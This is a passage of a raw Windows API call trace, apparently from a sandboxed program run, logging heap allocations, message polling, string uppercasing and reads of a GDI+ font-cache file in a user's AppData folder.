RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0209.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.346] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0209.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2bc [0209.347] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.347] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0209.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0209.347] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.347] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.347] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0209.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.gdipfontcachev1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0209.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0209.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.349] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.349] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0209.349] ReadFile (in: hFile=0x2bc, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0209.593] ReadFile (in: hFile=0x2bc, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xa918, lpOverlapped=0x0) returned 1 [0209.616] ReadFile (in: hFile=0x2bc, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0209.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a918) returned 0x34b2250 [0209.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.620] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0209.620] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0209.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0209.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a918) returned 0x34b2250 [0209.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0209.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0209.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a918) returned 0x34e7490 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0209.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0209.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0209.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0209.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0209.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0209.626] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0209.626] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.626] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0209.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0209.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0209.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0209.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.629] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.630] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.630] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.630] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0209.631] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.631] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.631] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.631] CharUpperBuffW (in: 